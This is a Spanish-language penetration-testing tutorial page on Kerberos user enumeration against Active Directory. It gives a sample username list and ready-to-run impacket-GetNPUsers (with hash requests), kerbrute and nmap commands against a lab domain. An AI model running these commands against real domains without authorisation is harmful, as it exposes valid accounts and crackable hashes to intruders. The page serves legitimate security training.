Enumeración de usuarios Kerberos

Descripción

La enumeración de usuarios en Kerberos consiste en hacer fuerza bruta al Active Directory mediante un diccionario de usuarios.

Para enumerar los usuario de Kerberos se envía una solicitud TGT sin pre-autenticación Si el KDC responde con el error KDC_ERR_C_PRINCIPAL_UNKNOWN, el nombre de usuario no existe. Sin embargo, si el KDC solicita pre-autenticación, sabemos que el nombre de usuario existe.

Esto no causa ningún error de inicio de sesión, por lo que no bloqueará la cuenta.

Para llevar a cabo la enumeración de usuarios en Kerberos se pueden utilizar las siguientes herramientas:

Impacket-GetNPUsers
Kerbrute
Nmap

La lista de usuarios para la enumeración tiene que tener el siguiente formato:

users.txt

iwolf
papa
administrator
danj
adamb
alans
chrisn
...

Impacket-GetNPUsers

impacket-GetNPUsers atlanta.corp/ -usersfile /home/iwolf/Desktop/users.txt -dc-ip 10.0.0.128 -request

En este caso se ha indicado el falg -request para que, si encuentra una cuenta que no requiere pre-autenticación automaticamente muestre el HASH del usuario.

Kerbrute

./kerbrute userenum --dc 10.0.0.128 -d atlanta.corp /home/iwolf/Desktop/users.txt

Nmap

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='atlanta.corp',userdb=/home/iwolf/Desktop/users.txt 10.0.0.128 -Pn

Referencias

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

GitHub - SecureAuthCorp/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

PreviousEnumeración NextKerberos

Last updated 3 years ago